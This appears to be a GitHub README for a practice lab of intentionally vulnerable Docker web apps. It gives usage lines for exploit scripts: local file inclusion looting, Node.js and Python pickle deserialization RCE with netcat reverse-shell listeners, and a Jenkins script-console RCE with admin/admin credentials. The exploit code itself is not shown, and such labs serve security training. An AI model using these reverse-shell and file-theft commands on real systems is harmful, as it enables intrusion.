vulnhub

Description

This project is some dockerized web applications that has any known vurnerability and a example on how to exploit them.

Usage

Start all vurnerable docker containers

   docker-compose up -d

lfi-php5

Example on how to exploit this container.
This command is an example on how to loot serverside files that normally will not be able to browse or download by use a LFI (local file inclusion)

lfi-loot.py -f index.php -g file -u http://localhost:8080

nodejs-deserialization

Example on how to exploit this container.

nc -nlvp 1337
./nodejs_deser_rce_nc.py http://localhost:3000 127.0.0.1 1337

Same exploit with listener build in so no netcat listener needed.

./nodejs_deser_rce.py http://localhost:3000 127.0.0.1 1337

pypickle-deserialization

Example on how to exploit this container.

nc -nlvp 1337
./pycpickle_deser_rce_nc.py http://localhost:5000 127.0.0.1 1337

Same exploit with listener build in so no netcat listener needed.

./pypicke_deser_rce.py http://localhost:5000 127.0.0.1 1337

jenkins-docker

Example on how to exploit this container

./jenkins_sconsole_rce.py 'http://localhost:8080' 10.10.14.24 1337 admin admin

=======

get-php

Example on how to exploit this container.

shellupgrader.py http://localhost/index.php 127.0.0.1 1337

Name		Name	Last commit message	Last commit date
Latest commit History 11 Commits
bin		bin
docker		docker
.gitignore		.gitignore
README.md		README.md
docker-compose.yml		docker-compose.yml

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

vulnhub

Description

Usage

lfi-php5

nodejs-deserialization

pypickle-deserialization

jenkins-docker

get-php

About

Releases

Packages

Languages

mikaelkall/vulnhub

Folders and files

Latest commit

History

Repository files navigation

vulnhub

Description

Usage

lfi-php5

nodejs-deserialization

pypickle-deserialization

jenkins-docker

get-php

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages